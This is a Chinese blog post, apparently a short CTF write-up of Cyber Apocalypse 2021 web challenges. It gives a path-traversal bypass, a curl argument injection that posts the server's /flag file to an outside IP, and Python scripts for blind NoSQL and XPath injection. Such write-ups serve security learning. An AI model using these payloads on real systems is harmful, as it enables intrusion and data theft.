Cyber Apocalypse 2021 Web 几个简单题目的wp

最新推荐文章于 2022-03-07 23:48:42 发布
最新推荐文章于 2022-03-07 23:48:42 发布
阅读量377 收藏 1
点赞数 2
分类专栏: 比赛WP 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/115920472
版权

前言

不算是一篇writeup,比较水,记录下自己的大致做题思路。主要还是这几天事情太多了,没那么多时间去打,只做了这几道简单的题目。

Inspector Gadget

进入看到CHTB{,f12发现有个main.js,第一行:

console.log("us3full_1nf0rm4tion}");

CHTB{us3full_1nf0rm4tion}

MiniSTRyplace

源码下载下来审计一下,看到的第一行php代码就感觉有问题:

include('pages/' . (isset($_GET['lang']) ? str_replace('../', '', $_GET['lang']) : $lang[array_rand($lang)]));

str_replace是不行的,仍然可以任意读:

?lang=..././..././flag

比较简单

Caas

关键代码:

$router->new('POST', '/api/curl', 'CurlController@execute' );
    public function __construct($url)
    {
        $this->command = "curl -sL " . escapeshellcmd($url);
    }

    public function exec()
    {
        exec($this->command, $output);
        return $output;
    }

执行curl命令,但是存在了escapeshellcmd的过滤。
查一下:
在这里插入图片描述
直接读flag:

ip= -F password=@/flag http://118.31.168.198:39543/

在这里插入图片描述

Wild Goose Hunt

下载源码,是node.js。根据entrypoint.sh里的内容:

mongo heros --eval "db.createCollection('users')"
mongo heros --eval 'db.users.insert( { username: "admin", password: "CHTB{f4k3_fl4g_f0r_t3st1ng}"} )'

flag是在表里面,而且还是表的admin对应的password,用的mongodb,查询:

router.post('/api/login', (req, res) => {
	let { username, password } = req.body;

	if (username && password) {
		return User.find({ 
			username,
			password
		})
			.then((user) => {
				if (user.length == 1) {
					return res.json({logged: 1, message: `Login Successful, welcome back ${user[0].username}.` });
				} else {
					return res.json({logged: 0, message: 'Login Failed'});
				}
			})
			.catch(() => res.json({ message: 'Something went wrong'}));
	}
	return res.json({ message: 'Invalid username or password'});
});

应该是SQL注入,隐约对于mongodb有印象,是nosql注入,但是忘了,再看一下之前的关于nosql的文章:
nosql注入
考虑注出password,我这里用一下正则匹配来布尔注入,脚本:

import requests

url="http://139.59.174.238:31693/api/login"

headers={
    'Content-Type': 'application/json'
}
flag = r"CHTB\\{"
data='{"username": {"$regex": "admin"},"password": {"$regex": "^%s.*"}}'
for i in range(60):
    for j in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_-":
        if j == "}":
            j == r"\\}"
        r=requests.post(url=url,data=data%(flag+j),headers=headers)
        if "Successful" in r.text:
            flag+=j
            print(flag)
            if j == r"\\}":
                exit()
            break

E.Tree

附件下载下来是个xml,看到flag被分成了2块,猜测是xpath注入了,好久没xpath注入了又忘了咋做了,参考文章:
xpath注入

写个脚本爆一下:

import  requests

url = "http://178.62.14.240:30145/api/search"
data1="{\"search\":\"'or substring(/military/district[position()=2]/staff[position()=3]/selfDestructCode,%s,1)='%s' or'\"}"
data2="{\"search\":\"'or substring(/military/district[position()=3]/staff[position()=2]/selfDestructCode,%s,1)='%s' or'\"}"

headers={
    'Content-Type': 'application/json'
}


flag =""
for i in range(1,50):
    for j in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789{}_-":
        #print(data1%(i,j))
        r=requests.post(url=url,headers=headers,data=data1%(i,j))
        #print(r.text)
        if "This millitary staff member exists" in r.text:
            flag +=j
            print(flag)
            break
bfengj
关注
专栏目录
Darkweb Cyber Threat Intelligence Mining 无水印pdf
10-16
Darkweb Cyber Threat Intelligence Mining 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,...
Cyber​​ Web Tools「Cyber Web Tools」-crx插件
03-09
它提供了两个选项,您可以通过选择所需的部分来捕获全屏网页或捕获网页的一部分。 02.估计 它估计输入字段与活动网页的细节,并提供过滤。这些输入字段在形式上进一步分类。输入详细信息是Id,名称,标签名称,类型...
HackTheBox Cyber Apocalypse 2021 部分题目Writeup
fnmsd的博客
05-06 5616
emm 节前被小白老板叫去参加了HackTheBox Cyber Apocalypse 2021,队伍名TigerEyes,最后排了第15。 为期一周的CTF,做两天就跑出去休假了,摸鱼摸鱼。。 Writeup Web 1(忘了叫啥了) 页面、JS、CSS的注释里分别隐藏了一段flag,一共三段,拼上就行了。 Web-emoji-voting 题目后端使用SQLite数据库,flag表的表名为flag_+10位随机的hex字符。 比较明显的拼接式Order by注入 所以是SQLITE Orderb
2021台湾省赛CTF-web-wp
Firebasky的博客
01-19 1146
重复了*CTF,队友做了*CTF的部分web,当时自己没有出呜呜呜,就去做台湾的比赛了。 链接:https://pan.baidu.com/s/1oIXI7Ygt4k9e143kddXOgQ 提取码:u2pl 复制这段内容后打开百度网盘手机App,操作更方便哦 ...
VNCTF2021[WEB]
Y4tacker的博客
03-18 3662
文章目录前言Ez_gamenaiverealezjvavEasy_laravel 前言 这次比赛题目质量很好,本菜鸡做出了两道web题目,还是比较开心,只是赛后复现laravel一天半也没有成功,我好自闭啊 Ez_game 在game.js里面发现,直接放到console里面跑,得到flag ["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6
XCTF-CyBRICS2021 几道简单题的WP
mumuzi的博客
07-25 1397
1.Mic Check (Cyber, Baby, 50 pts) 签到题,查看rules,那个就是flag cybrics{Th1S_i5_T3h_R34l_m1C_ch3CK_f1A6} 2.Scanner (rebyC, Baby, 50 pts) 第一关每次都是房子,后面三关就看到什么填什么单词就过了,最后是一张二维码. 下载下来用GIFFrame分离出来,然后可以看帧找到哪些图拿来拼起来就是一张完整的二维码 写脚本 from PIL import Image list = [8,11,1.
ASPICE_for_Cybersecurity_Yellow_Volume_1st_edition_2021.pdf
10-20
在这个特定的文档“ASPICE for Cybersecurity Yellow Volume 1st edition 2021”中,焦点在于将ASPICE框架应用于网络安全领域,以确保汽车电子软件的安全性。 网络安全在当今信息化社会中至关重要,尤其是在汽车...
ISO SAE 21434-2021 Road vehicles - Cybersecurity engineering.pdf
10-21
ISO/SAE 21434的核心内容可能包括以下几个关键知识点: 1. **风险评估与管理**:标准要求企业进行系统性的风险评估,识别可能的威胁源、脆弱性和影响,以便制定相应的防护策略。这涉及到识别网络攻击的路径,以及...
ISO SAE 21434-2021 Road vehicles - Cybersecurity engineering英文原版
04-21
ISO SAE 21434-2021 Road vehicles — Cybersecurity engineering.pdf 英文版
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9988
前言 记录一下webwp,随手写的,只会前三题,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
2021-西湖论剑-Web-Writeup
feng的博客
11-21 6119
前言 师傅们随便看看吧。。排版可能不太好,第一次用飞书,wp有一部分是学长写的,弄到csdn上也懒得重新排版了。。。 oa?RCE? 首先先看到一个登录界面 先试一下弱口令admin/admin123进入后台 后台功能点很多,试了下网上的poc,结果没有写入权限。开始审计代码 发现有个phpinfo的路由,访问一下发现了开启register_argc_argv。 时发现这个cms的文件包含点特别多,但是很多都限制了文件后缀,比如Action.php,这里我恰好在index路由中找到了一个只限制后缀为.ph
陇原战疫2021网络安全大赛 Web
feng的博客
11-08 5589
前言 题挺有意思的,Web有点难,而且后面三道难题放的有点晚了,时间不够(肝了一下午的Java)。这个比赛的难度,能早9晚9的话可能还好一些,早9晚5就有点紧了。 Java还是太菜了,需要学很多的东西。 eaaasyphp 反序列化链的构造很简单就不提了,正常构造写文件发现应该是不行的,目录应该不可写。给了个Hint类里面提示phpinfo,那打一下phpinfo看一下: class Bypass { public function __construct(){ $this->
2022-D^3CTF-Web-Writeup
feng的博客
03-07 5567
2022-D^3CTF-Web-Writeup 前言 比赛的时候做了shorter就摆烂了,正好有个作业拖到了周末别的题目就没怎么看。幸好比赛环境还保存1周,把Java给复现了,剩下3题看看wp学习学习不想复现了。别的题目wp参考网上吧。 shorter rome反序列化,但是要缩短长度。 参考https://4ra1n.love/post/-IMSkqHfy/#%E5%88%A0%E9%99%A4%E9%87%8D%E5%86%99%E6%96%B9%E6%B3%95 但是最后还是长了。改用Jiang宝
2021-CISCN-fianl-ezj4va
feng的博客
03-04 4814
2021-CISCN-fianl-ezj4va 前言 去年国赛决赛的0解Java,后来出现在了DASCTF八月挑战赛,当时不太会Java所以没有看,今天找个时间复现了一下。写的比较简单,具体可以看参考链接中的文章。 代码审计 访问/robots.txt得到文件名可以下载到源码。 pom.xml: <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
2021-湖湘杯-Web
feng的博客
11-14 4555
前言 总的来说的话,题目质量还是不错的,另外那道XSS也是0解,也幸好自己是一点XSS都不会(寒假补一波),卷是真的卷,还有很多的东西都只停留在表面吧,除了shiro的鉴权绕过是自己之前专门学过的,所以打开pom.xml看到1.5.0的版本立马就知道这题得有个鉴权绕过,别的,剩下的打shiro一开始没打通才换了工具打(后来才发现我一直在拿cc的链子打,我说怎么打不通。。。)。还是慢慢学习了。 easywill 打开页面发现是个WillPHP,而且应该就是assign的模板渲染了,而且根据这个东西和tp有点关
鹤城杯2021 Web
feng的博客
10-09 4529
easy_sql_2 登录功能,post传username和password。尝试admin,admin弱口令登录成功但是提示flag并不在这里。 username尝试-1'||'1'%23发现是password error!,因此猜测后端的应该是根据传入的username查出对应的password,查到了就不再是username error!,然后讲传入的password进行一次md5后与这个password比较,相同就登录成功。 尝试SQL注入,但是ban了select,因此利用table注入。 数据库
D3CTF2021-non-RCE
feng的博客
03-07 4195
non-RCE 前言 去年D3CTF题目,最近刚复现完国赛的那道Java,感觉出题的思路也是魔改的这题,所以来复现一下这题。 password绕过 不谈代码了,因为审完之后思路还是比较清晰的,就是利用JDBC对AsjpectJWeaver反序列化写文件到classpath然后反序列化rce。 第一重过滤是这个: public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterCha
NepCTF2021一些web题目的总结与复现
feng的博客
03-23 3920
前言 参加了今年的NepCTF题目质量很好,就是周末事情比较多,而且只会php,没有全身心去做,
[2021东华杯]Web Writeup
feng的博客
11-01 3631
EzGadget 给了源码,IDEA打开看看,有个反序列化的点: @ResponseBody @RequestMapping({"/readobject"}) public String unser(@RequestParam(name = "data",required = true) String data, Model model) throws Exception { byte[] b = Tools.base64Decode(data); I
人工智能与网络安全:Cyber Threat Intelligence探索
"《Cyber Threat Intelligence》是由Ali Dehghantanha、Mauro Conti和Tooska Dargahi合编的一本书,属于 Advances in Information Security 系列的第70卷。这本书关注的是网络安全威胁情报的领域,探讨了在日益增多...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值